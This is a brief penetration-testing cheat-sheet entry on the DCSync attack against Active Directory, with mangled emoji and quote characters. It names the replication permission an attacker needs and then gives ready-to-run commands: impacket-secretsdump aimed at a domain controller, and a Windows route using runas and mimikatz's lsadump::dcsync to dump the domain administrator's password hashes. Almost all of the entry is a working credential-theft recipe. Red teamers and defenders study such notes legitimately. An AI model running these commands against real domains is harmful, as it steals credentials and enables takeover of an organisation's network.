πŸ”„

DCSync

Tags
AuthenticatedDS-Replication-Get-Changes

Identify

Do you control and object with the DS-Replication-Get-Changes ACL?

Exploit

impacket-secretsdump 'domain.local'/'<user>':'<pass>'@'<DC0IP>'
Remote

From windows

runas /netonly /user:DOMAIN\user powershell
local where β€œuser” has the required ACL
.\mimikatz.exe
privilege::debug
lsadump::dcsync /domain:DOMAIN.LOCAL /user:DOMAIN\administrator